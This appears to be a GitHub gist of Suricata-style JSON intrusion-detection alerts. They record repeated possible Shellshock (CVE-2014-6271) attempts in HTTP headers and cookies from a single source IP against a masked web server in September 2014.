{"timestamp":"2014-09-29T16:12:14.828664","event_type":"alert","src_ip":"62.210.75.170","src_port":55175,"dest_ip":"XXX.XXX.XXX.XXX","dest_port":80,"proto":"TCP","alert":{"action":"allowed","gid":1,"signature_id":2019239,"rev":3,"signature":"ET WEB_SERVER Possible CVE-2014-6271 Attempt in HTTP Cookie","category":"Attempted Administrator Privilege Gain","severity":1}} | |
{"timestamp":"2014-09-29T16:12:14.923311","event_type":"alert","src_ip":"62.210.75.170","src_port":55216,"dest_ip":"XXX.XXX.XXX.XXX","dest_port":80,"proto":"TCP","alert":{"action":"allowed","gid":1,"signature_id":2019232,"rev":3,"signature":"ET WEB_SERVER Possible CVE-2014-6271 Attempt in Headers","category":"Attempted Administrator Privilege Gain","severity":1}} | |
{"timestamp":"2014-09-29T16:12:14.923311","event_type":"alert","src_ip":"62.210.75.170","src_port":55216,"dest_ip":"XXX.XXX.XXX.XXX","dest_port":80,"proto":"TCP","alert":{"action":"allowed","gid":1,"signature_id":2019232,"rev":3,"signature":"ET WEB_SERVER Possible CVE-2014-6271 Attempt in Headers","category":"Attempted Administrator Privilege Gain","severity":1}} | |
{"timestamp":"2014-09-29T16:12:14.923311","event_type":"alert","src_ip":"62.210.75.170","src_port":55216,"dest_ip":"XXX.XXX.XXX.XXX","dest_port":80,"proto":"TCP","alert":{"action":"allowed","gid":1,"signature_id":2019239,"rev":3,"signature":"ET WEB_SERVER Possible CVE-2014-6271 Attempt in HTTP Cookie","category":"Attempted Administrator Privilege Gain","severity":1}} | |
{"timestamp":"2014-09-29T16:12:14.923311","event_type":"alert","src_ip":"62.210.75.170","src_port":55216,"dest_ip":"XXX.XXX.XXX.XXX","dest_port":80,"proto":"TCP","alert":{"action":"allowed","gid":1,"signature_id":2019232,"rev":3,"signature":"ET WEB_SERVER Possible CVE-2014-6271 Attempt in Headers","category":"Attempted Administrator Privilege Gain","severity":1}} | |
{"timestamp":"2014-09-29T16:12:14.923311","event_type":"alert","src_ip":"62.210.75.170","src_port":55216,"dest_ip":"XXX.XXX.XXX.XXX","dest_port":80,"proto":"TCP","alert":{"action":"allowed","gid":1,"signature_id":2019239,"rev":3,"signature":"ET WEB_SERVER Possible CVE-2014-6271 Attempt in HTTP Cookie","category":"Attempted Administrator Privilege Gain","severity":1}} | |
{"timestamp":"2014-09-29T16:12:15.035308","event_type":"alert","src_ip":"62.210.75.170","src_port":55252,"dest_ip":"XXX.XXX.XXX.XXX","dest_port":80,"proto":"TCP","alert":{"action":"allowed","gid":1,"signature_id":2019232,"rev":3,"signature":"ET WEB_SERVER Possible CVE-2014-6271 Attempt in Headers","category":"Attempted Administrator Privilege Gain","severity":1}} | |
{"timestamp":"2014-09-29T16:12:15.035308","event_type":"alert","src_ip":"62.210.75.170","src_port":55252,"dest_ip":"XXX.XXX.XXX.XXX","dest_port":80,"proto":"TCP","alert":{"action":"allowed","gid":1,"signature_id":2019232,"rev":3,"signature":"ET WEB_SERVER Possible CVE-2014-6271 Attempt in Headers","category":"Attempted Administrator Privilege Gain","severity":1}} | |
{"timestamp":"2014-09-29T16:12:15.035308","event_type":"alert","src_ip":"62.210.75.170","src_port":55252,"dest_ip":"XXX.XXX.XXX.XXX","dest_port":80,"proto":"TCP","alert":{"action":"allowed","gid":1,"signature_id":2019239,"rev":3,"signature":"ET WEB_SERVER Possible CVE-2014-6271 Attempt in HTTP Cookie","category":"Attempted Administrator Privilege Gain","severity":1}} | |
{"timestamp":"2014-09-29T16:12:15.134790","event_type":"alert","src_ip":"62.210.75.170","src_port":55297,"dest_ip":"XXX.XXX.XXX.XXX","dest_port":80,"proto":"TCP","alert":{"action":"allowed","gid":1,"signature_id":2019232,"rev":3,"signature":"ET WEB_SERVER Possible CVE-2014-6271 Attempt in Headers","category":"Attempted Administrator Privilege Gain","severity":1}} | |
{"timestamp":"2014-09-29T16:12:15.134790","event_type":"alert","src_ip":"62.210.75.170","src_port":55297,"dest_ip":"XXX.XXX.XXX.XXX","dest_port":80,"proto":"TCP","alert":{"action":"allowed","gid":1,"signature_id":2019232,"rev":3,"signature":"ET WEB_SERVER Possible CVE-2014-6271 Attempt in Headers","category":"Attempted Administrator Privilege Gain","severity":1}} | |
{"timestamp":"2014-09-29T16:12:15.134790","event_type":"alert","src_ip":"62.210.75.170","src_port":55297,"dest_ip":"XXX.XXX.XXX.XXX","dest_port":80,"proto":"TCP","alert":{"action":"allowed","gid":1,"signature_id":2019239,"rev":3,"signature":"ET WEB_SERVER Possible CVE-2014-6271 Attempt in HTTP Cookie","category":"Attempted Administrator Privilege Gain","severity":1}} | |
{"timestamp":"2014-09-29T16:12:15.238505","event_type":"alert","src_ip":"62.210.75.170","src_port":55326,"dest_ip":"XXX.XXX.XXX.XXX","dest_port":80,"proto":"TCP","alert":{"action":"allowed","gid":1,"signature_id":2019232,"rev":3,"signature":"ET WEB_SERVER Possible CVE-2014-6271 Attempt in Headers","category":"Attempted Administrator Privilege Gain","severity":1}} | |
{"timestamp":"2014-09-29T16:12:15.238505","event_type":"alert","src_ip":"62.210.75.170","src_port":55326,"dest_ip":"XXX.XXX.XXX.XXX","dest_port":80,"proto":"TCP","alert":{"action":"allowed","gid":1,"signature_id":2019232,"rev":3,"signature":"ET WEB_SERVER Possible CVE-2014-6271 Attempt in Headers","category":"Attempted Administrator Privilege Gain","severity":1}} | |
{"timestamp":"2014-09-29T16:12:15.238505","event_type":"alert","src_ip":"62.210.75.170","src_port":55326,"dest_ip":"XXX.XXX.XXX.XXX","dest_port":80,"proto":"TCP","alert":{"action":"allowed","gid":1,"signature_id":2019239,"rev":3,"signature":"ET WEB_SERVER Possible CVE-2014-6271 Attempt in HTTP Cookie","category":"Attempted Administrator Privilege Gain","severity":1}} | |
{"timestamp":"2014-09-29T16:12:15.344311","event_type":"alert","src_ip":"62.210.75.170","src_port":55357,"dest_ip":"XXX.XXX.XXX.XXX","dest_port":80,"proto":"TCP","alert":{"action":"allowed","gid":1,"signature_id":2019232,"rev":3,"signature":"ET WEB_SERVER Possible CVE-2014-6271 Attempt in Headers","category":"Attempted Administrator Privilege Gain","severity":1}} | |
{"timestamp":"2014-09-29T16:12:15.344311","event_type":"alert","src_ip":"62.210.75.170","src_port":55357,"dest_ip":"XXX.XXX.XXX.XXX","dest_port":80,"proto":"TCP","alert":{"action":"allowed","gid":1,"signature_id":2019232,"rev":3,"signature":"ET WEB_SERVER Possible CVE-2014-6271 Attempt in Headers","category":"Attempted Administrator Privilege Gain","severity":1}} | |
{"timestamp":"2014-09-29T16:12:15.344311","event_type":"alert","src_ip":"62.210.75.170","src_port":55357,"dest_ip":"XXX.XXX.XXX.XXX","dest_port":80,"proto":"TCP","alert":{"action":"allowed","gid":1,"signature_id":2019239,"rev":3,"signature":"ET WEB_SERVER Possible CVE-2014-6271 Attempt in HTTP Cookie","category":"Attempted Administrator Privilege Gain","severity":1}} | |
{"timestamp":"2014-09-29T16:12:15.439131","event_type":"alert","src_ip":"62.210.75.170","src_port":55391,"dest_ip":"XXX.XXX.XXX.XXX","dest_port":80,"proto":"TCP","alert":{"action":"allowed","gid":1,"signature_id":2019232,"rev":3,"signature":"ET WEB_SERVER Possible CVE-2014-6271 Attempt in Headers","category":"Attempted Administrator Privilege Gain","severity":1}} | |
{"timestamp":"2014-09-29T16:12:15.439131","event_type":"alert","src_ip":"62.210.75.170","src_port":55391,"dest_ip":"XXX.XXX.XXX.XXX","dest_port":80,"proto":"TCP","alert":{"action":"allowed","gid":1,"signature_id":2019232,"rev":3,"signature":"ET WEB_SERVER Possible CVE-2014-6271 Attempt in Headers","category":"Attempted Administrator Privilege Gain","severity":1}} | |
{"timestamp":"2014-09-29T16:12:15.439131","event_type":"alert","src_ip":"62.210.75.170","src_port":55391,"dest_ip":"XXX.XXX.XXX.XXX","dest_port":80,"proto":"TCP","alert":{"action":"allowed","gid":1,"signature_id":2019239,"rev":3,"signature":"ET WEB_SERVER Possible CVE-2014-6271 Attempt in HTTP Cookie","category":"Attempted Administrator Privilege Gain","severity":1}} | |
{"timestamp":"2014-09-29T16:12:15.439131","event_type":"alert","src_ip":"62.210.75.170","src_port":55391,"dest_ip":"XXX.XXX.XXX.XXX","dest_port":80,"proto":"TCP","alert":{"action":"allowed","gid":1,"signature_id":2019232,"rev":3,"signature":"ET WEB_SERVER Possible CVE-2014-6271 Attempt in Headers","category":"Attempted Administrator Privilege Gain","severity":1}} | |
{"timestamp":"2014-09-29T16:12:15.439131","event_type":"alert","src_ip":"62.210.75.170","src_port":55391,"dest_ip":"XXX.XXX.XXX.XXX","dest_port":80,"proto":"TCP","alert":{"action":"allowed","gid":1,"signature_id":2019239,"rev":3,"signature":"ET WEB_SERVER Possible CVE-2014-6271 Attempt in HTTP Cookie","category":"Attempted Administrator Privilege Gain","severity":1}} |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment